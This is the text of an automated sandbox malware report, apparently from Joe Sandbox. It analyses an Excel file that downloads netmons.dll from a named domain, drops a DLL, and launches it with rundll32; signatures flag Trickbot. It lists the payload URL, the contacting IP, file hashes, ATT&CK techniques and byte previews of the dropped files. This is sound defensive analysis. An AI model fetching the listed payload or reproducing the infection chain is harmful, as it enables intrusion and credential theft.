                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                Source: Binary string: k:\MSSniffer\Release\Sniffer.pdb\A source: hsdksksk.iem.0.dr
                Source: Binary string: k:\MSSniffer\Release\Sniffer.pdb source: hsdksksk.iem.0.dr
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_003A1030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,4_2_003A1030
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00485950 push dword ptr [edx+14h]; ret 4_2_00485A5D
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\hsdksksk.iemJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\netmons[1].dllJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\hsdksksk.iemJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\hsdksksk.iemJump to dropped file

                Boot Survival:

                barindex
                Drops PE files to the user root directoryShow sources
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\hsdksksk.iemJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion:

                barindex
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                Source: hsdksksk.iem.0.drBinary or memory string: ORIGINALFILENAMESNIFFER.EXEJ
                Source: hsdksksk.iem.0.drBinary or memory string: INTERNALNAMESNIFFER.EXE
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\netmons[1].dllJump to dropped file
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_003A1030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,4_2_003A1030
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_002C095E mov eax, dword ptr fs:[00000030h]4_2_002C095E
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_002C0456 mov eax, dword ptr fs:[00000030h]4_2_002C0456
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_003A1030 mov eax, dword ptr fs:[00000030h]4_2_003A1030
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_003A1030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,4_2_003A1030
                Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\hsdksksk.iem,StartWJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exeJump to behavior

                Stealing of Sensitive Information:

                barindex
                Yara detected TrickbotShow sources
                Source: Yara matchFile source: 00000004.00000002.2100678651.0000000000470000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2100567095.00000000002C0000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2100613239.00000000003A4000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2100649939.00000000003E1000.00000020.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 4.2.rundll32.exe.3e0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.rundll32.exe.2c052e.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.rundll32.exe.2c052e.1.unpack, type: UNPACKEDPE

                Remote Access Functionality:

                barindex
                Yara detected TrickbotShow sources
                Source: Yara matchFile source: 00000004.00000002.2100678651.0000000000470000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2100567095.00000000002C0000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2100613239.00000000003A4000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2100649939.00000000003E1000.00000020.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 4.2.rundll32.exe.3e0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.rundll32.exe.2c052e.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.rundll32.exe.2c052e.1.unpack, type: UNPACKEDPE

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid AccountsScripting11Path InterceptionProcess Injection11Masquerading121OS Credential DumpingSecurity Software Discovery21Remote ServicesData from Local SystemExfiltration Over Other Network MediumIngress Tool Transfer12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default AccountsNative API1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsExploitation for Client Execution43Logon Script (Windows)Logon Script (Windows)Process Injection11Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol22Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting11NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information1LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.commonRundll321Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                SecuriteInfo.com.Heur.32219.xls9%VirustotalBrowse

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\netmons[1].dll13%ReversingLabsWin32.Trojan.Trickpak
                C:\Users\user\hsdksksk.iem13%ReversingLabsWin32.Trojan.Trickpak

                Unpacked PE Files

                SourceDetectionScannerLabelLinkDownload
                4.2.rundll32.exe.3e0000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.icra.org/vocabulary/.0%URL Reputationsafe
                http://www.icra.org/vocabulary/.0%URL Reputationsafe
                http://www.icra.org/vocabulary/.0%URL Reputationsafe
                http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                http://koneckotechnology.com/netmons.dll0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                koneckotechnology.com
                198.54.114.131
                truefalse
                  unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://koneckotechnology.com/netmons.dllfalse
                  • Avira URL Cloud: safe
                  unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000003.00000002.2101849521.0000000001E37000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2101059002.0000000002057000.00000002.00000001.sdmpfalse
                    high
                    http://www.windows.com/pctv.rundll32.exe, 00000004.00000002.2100870975.0000000001E70000.00000002.00000001.sdmpfalse
                      high
                      http://investor.msn.comrundll32.exe, 00000003.00000002.2101618161.0000000001C50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2100870975.0000000001E70000.00000002.00000001.sdmpfalse
                        high
                        http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000003.00000002.2101618161.0000000001C50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2100870975.0000000001E70000.00000002.00000001.sdmpfalse
                          high
                          http://www.icra.org/vocabulary/.rundll32.exe, 00000003.00000002.2101849521.0000000001E37000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2101059002.0000000002057000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000003.00000002.2101849521.0000000001E37000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2101059002.0000000002057000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://www.hotmail.com/oerundll32.exe, 00000003.00000002.2101618161.0000000001C50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2100870975.0000000001E70000.00000002.00000001.sdmpfalse
                            high
                            http://investor.msn.com/rundll32.exe, 00000003.00000002.2101618161.0000000001C50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2100870975.0000000001E70000.00000002.00000001.sdmpfalse
                              high

                              Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public

                              IPDomainCountryFlagASNASN NameMalicious
                              198.54.114.131
                              koneckotechnology.comUnited States
                              22612NAMECHEAP-NETUSfalse

                              General Information

                              Joe Sandbox Version:32.0.0 Black Diamond
                              Analysis ID:412857
                              Start date:13.05.2021
                              Start time:01:48:22
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 15m 15s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Sample file name:SecuriteInfo.com.Heur.32219.22782 (renamed file extension from 22782 to xls)
                              Cookbook file name:defaultwindowsofficecookbook.jbs
                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                              Number of analysed new started processes analysed:6
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal100.troj.expl.evad.winXLS@7/7@1/1
                              EGA Information:Failed
                              HDC Information:
                              • Successful, ratio: 3.8% (good quality ratio 3.8%)
                              • Quality average: 100%
                              • Quality standard deviation: 0%
                              HCA Information:
                              • Successful, ratio: 100%
                              • Number of executed functions: 10
                              • Number of non-executed functions: 4
                              Cookbook Comments:
                              • Adjust boot time
                              • Enable AMSI
                              Warnings:
                              Show All
                              • Max analysis timeout: 720s exceeded, the analysis took too long
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtCreateFile calls found.
                              • Report size getting too big, too many NtQueryAttributesFile calls found.

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              01:48:47API Interceptor1x Sleep call for process: rundll32.exe modified

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              198.54.114.13159c9f346_by_Libranalysis.xlsGet hashmaliciousBrowse
                              • koneckotechnology.com/netmons.dll
                              c527325d_by_Libranalysis.xlsGet hashmaliciousBrowse
                              • koneckotechnology.com/netmons.dll
                              Dridex.xlsGet hashmaliciousBrowse
                              • kmschoolsystems.net/lzpd0w.zip

                              Domains

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              koneckotechnology.com59c9f346_by_Libranalysis.xlsGet hashmaliciousBrowse
                              • 198.54.114.131
                              c527325d_by_Libranalysis.xlsGet hashmaliciousBrowse
                              • 198.54.114.131

                              ASN

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              NAMECHEAP-NETUS1cec9342_by_Libranalysis.exeGet hashmaliciousBrowse
                              • 198.54.114.164
                              First_stely_shit_open_please.exeGet hashmaliciousBrowse
                              • 199.188.200.202
                              59c9f346_by_Libranalysis.xlsGet hashmaliciousBrowse
                              • 198.54.114.131
                              c527325d_by_Libranalysis.xlsGet hashmaliciousBrowse
                              • 198.54.114.131
                              CRPR7mRha6.exeGet hashmaliciousBrowse
                              • 198.54.122.60
                              W9YDH79i8G.exeGet hashmaliciousBrowse
                              • 198.54.122.60
                              Ko4zQgTBHv.exeGet hashmaliciousBrowse
                              • 198.54.122.60
                              Purchase Order.exeGet hashmaliciousBrowse
                              • 198.54.126.165
                              wed.docGet hashmaliciousBrowse
                              • 198.54.122.60
                              ORDER CONFIRMATION.docGet hashmaliciousBrowse
                              • 198.54.122.60
                              SecuriteInfo.com.Trojan.Packed2.43091.10004.exeGet hashmaliciousBrowse
                              • 198.54.122.60
                              6e5c05e1_by_Libranalysis.exeGet hashmaliciousBrowse
                              • 198.54.122.60
                              RFQ Plasma cutting machine.docGet hashmaliciousBrowse
                              • 198.54.122.60
                              Order 122001-220 guanzo.exeGet hashmaliciousBrowse
                              • 198.54.117.216
                              main_setup_x86x64.exeGet hashmaliciousBrowse
                              • 162.255.119.164
                              00098765123POIIU.exeGet hashmaliciousBrowse
                              • 199.192.23.253
                              e8eRhf3GM0.xlsmGet hashmaliciousBrowse
                              • 185.61.154.27
                              2021_May_Quotation_pdf.exeGet hashmaliciousBrowse
                              • 198.54.115.133
                              337840b9_by_Libranalysis.exeGet hashmaliciousBrowse
                              • 198.54.122.60
                              Citvonvhciktufwvyzyhistnewdjgsoqdr.exeGet hashmaliciousBrowse
                              • 198.54.117.212

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\netmons[1].dll59c9f346_by_Libranalysis.xlsGet hashmaliciousBrowse
                                c527325d_by_Libranalysis.xlsGet hashmaliciousBrowse
                                  C:\Users\user\hsdksksk.iem59c9f346_by_Libranalysis.xlsGet hashmaliciousBrowse
                                    c527325d_by_Libranalysis.xlsGet hashmaliciousBrowse

                                      Created / dropped Files

                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\netmons[1].dll
                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):643072
                                      Entropy (8bit):6.894237499747235
                                      Encrypted:false
                                      SSDEEP:12288:o2ga6aRz0uEbMN7TR7EPMx4lK6SjVWDeyt7kGXDba2k5GA:fgPaRz3CMNR/4lu8f7Pnq5GA
                                      MD5:3BB9FE6B7E6B4D9C3A3C83DE6AACD952
                                      SHA1:57C343AE5E95FE702B759737522E85FE9E97FE5E
                                      SHA-256:697DEA4B154178E8DE096C66167B539AA4465155D294B11765F1A1886EB7C56D
                                      SHA-512:1E98417C6C48E0BF405AE5FEDA4193C91A3B385F387F33D79FBA3DC6F7AA7571444885E6628B7CA6075887BFBEC3BD17E0782C11A1C45A7D4B1A139849CA4DF0
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 13%
                                      Joe Sandbox View:
                                      • Filename: 59c9f346_by_Libranalysis.xls, Detection: malicious, Browse
                                      • Filename: c527325d_by_Libranalysis.xls, Detection: malicious, Browse
                                      Reputation:low
                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g]..#<.#<.#<.4..)<....%<.04..!<.&0..8<.&0...<.#<.b>.4..0<.&0..W<.&0.."<..7.."<.&0.."<.Rich#<.................PE..L......`...........!.........@.......................................................................................>..E...\!..........|....................p...4......................................H.................... ..@....................text....x.......................... ..`.rdata..U...........................@..@.data....Y...@...0...@..............@....rsrc...|............p..............@..@.reloc.......p.......@..............@..B........................................................................................................................................................................................................................................................................................................
                                      C:\Users\user\AppData\Local\Temp\71EE0000
                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):82102
                                      Entropy (8bit):7.89057556988921
                                      Encrypted:false
                                      SSDEEP:1536:9KWFA4s1rWGH3W4nAeWRlMVGoIahaDHTU6hryF70KiZ:9KWFA4s1rW23W4ng2sTU2yF70KiZ
                                      MD5:D142FA450F0F0D3B7B50CA21E9FB3004
                                      SHA1:5E6B41E41041641F4841C4A5BC3C4EBD1050EB05
                                      SHA-256:425F91DACC94180825D3E42B226F03524A52ADC0782F3EE43DAC3AB3554837E0
                                      SHA-512:535BFF423C41BCF8B648314C4139F0B8B2F68F954ACE828FB8DEFF5AE1C4D5270B50D6837E8F2B6EB0AE054691F4C603BFD9E07E57E0E4E685CA87CE65EB124E
                                      Malicious:false
                                      Reputation:low
                                      Preview: .U.N.0....;D....&M....]2...0.Ic...1......A...H.$.......5..D...Y....J.u..^......pJ..e[@v.:.........[...s...+.....t>Z..3.y.r#......\z...:e..Z..N.T]..s..U?v.T.....'.`.I.P.iL... ...R$Z.~..A.z......^..La.Q.#Os<..q.i..VP]......|0.......8Ivi..A.i..H..2..'n.........D^^./.|...:-Ayykik....*d.49Ii..(.G#.%.b3.....eFnok.}.A..}|. .../..|..Phf6.....s...r/".?)R.{w...g|.(..>6..#.1]:.W...B.....P.3..D.1i.W....W...z......P.&.y..V........PK..........!..uq.............[Content_Types].xml ...(..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Thu May 13 07:48:43 2021, atime=Thu May 13 07:48:43 2021, length=8192, window=hide
                                      Category:dropped
                                      Size (bytes):867
                                      Entropy (8bit):4.483620836343206
                                      Encrypted:false
                                      SSDEEP:12:85QJCiA0LgXg/XAlCPCHaXEKB8VXB/RsX+WnicvbG+bDtZ3YilMMEpxRljKbTdJU:85Bi/XT0K6VXEYevDv3qKrNru/
                                      MD5:CF89FECF15B4AFD2F6C3847707E24D8E
                                      SHA1:C640AF43927C1E78563A6E624B5C470305155186
                                      SHA-256:E9DFC2AD8DBB30BDFFD57BBE39794CFA8A32D8A31EF2F429774DC858626AE332
                                      SHA-512:F90552A5A6AA2E1A6B822776A2B64A5E35C15F19BEC0FBE509D1FB380B2C54637916F5B4D042B61D6BF9D6179A0A01311D6D991BA4432664A37E8246121B5AB1
                                      Malicious:false
                                      Reputation:low
                                      Preview: L..................F...........7G...&;..G...&;..G... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R.F..Desktop.d......QK.X.R.F*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\216041\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......216041..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\SecuriteInfo.com.Heur.32219.LNK
                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu May 13 07:48:30 2021, mtime=Thu May 13 07:48:43 2021, atime=Thu May 13 07:48:43 2021, length=107520, window=hide
                                      Category:dropped
                                      Size (bytes):2198
                                      Entropy (8bit):4.568094777517766
                                      Encrypted:false
                                      SSDEEP:48:80/XT0ZVXpHhFyHhwKQh20/XT0ZVXpHhFyHhwKQ/:80/XuVXpbKQh20/XuVXpbKQ/
                                      MD5:1190531A9E1F2D3B7DF1EC5931401519
                                      SHA1:EE288D9AD34AE5411810D8675607C89D7E6516BC
                                      SHA-256:714B6DCA9C727F05F47995E883C12972F5F5EE35A457514245E0C2ABF524AB09
                                      SHA-512:01D12F1429DC273ACDA8ECE247B62632735F8D6620F5275E1630D4BA71FC09D99A55BDAF2695165493BDD7135AC2E6740BA5B0C5855408F9FA1256A250F5FB9D
                                      Malicious:false
                                      Reputation:low
                                      Preview: L..................F.... ...8....G...&;..G..=.D..G...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R.F..Desktop.d......QK.X.R.F*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2..T...R.F .SECURI~1.XLS..l......R.F.R.F*....%....................S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...H.e.u.r...3.2.2.1.9...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\216041\Users.user\Desktop\SecuriteInfo.com.Heur.32219.xls.6.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...H.e.u.r...3.2.2.1.9...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`
                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):134
                                      Entropy (8bit):4.809828785316945
                                      Encrypted:false
                                      SSDEEP:3:oyBVomM0bbcd5ouscbbcd5omM0bbcd5ov:dj60i5Vi560i5y
                                      MD5:CA5CCBB60A8F1D7106F009189FDAA89A
                                      SHA1:8403283EB886BBE8CDDE5EBAE93A404E95DD60C2
                                      SHA-256:B21B9338FAFD2534E092A29CBD91C6191B752893052C91D9D8E0E39A5EF4F70A
                                      SHA-512:8F9F71C2990E49364E592B155EF260712F7B32690C57C6E0DC4F6E74275A3F69D3FCA629729A1997C845106FEEFABF6D66548604D70BEFA4ED24511722214FDD
                                      Malicious:false
                                      Reputation:low
                                      Preview: Desktop.LNK=0..[xls]..SecuriteInfo.com.Heur.32219.LNK=0..SecuriteInfo.com.Heur.32219.LNK=0..[xls]..SecuriteInfo.com.Heur.32219.LNK=0..
                                      C:\Users\user\Desktop\42EE0000
                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                      File Type:Applesoft BASIC program data, first line number 16
                                      Category:dropped
                                      Size (bytes):140623
                                      Entropy (8bit):6.7953105382189065
                                      Encrypted:false
                                      SSDEEP:3072:hm8rmjAItyzElBIL6lECbgBGGP5xLmuCSS62rTUKyF70/iLW2K0P+U2K0Ps/hm8f:E8rmjAItyzElBIL6lECbgBvP5NmuCSS+
                                      MD5:4D3A0B0125D561E5232043E09932F88E
                                      SHA1:A211B5D29B2EE1E594E4084282B9522473EABE42
                                      SHA-256:20AB1224A546FF43AF9CC99BE30A8A89519679CB0709FF3674B00AA6E704DA0F
                                      SHA-512:E2305290D66D3D1E33B96E7EE449F23A2A86D94C6183F6DA06FF6182E3DFD636BD4553620A1049891FE67D1F60311E87F363865D26C2FB8AF2DD4F714070A2C6
                                      Malicious:false
                                      Reputation:low
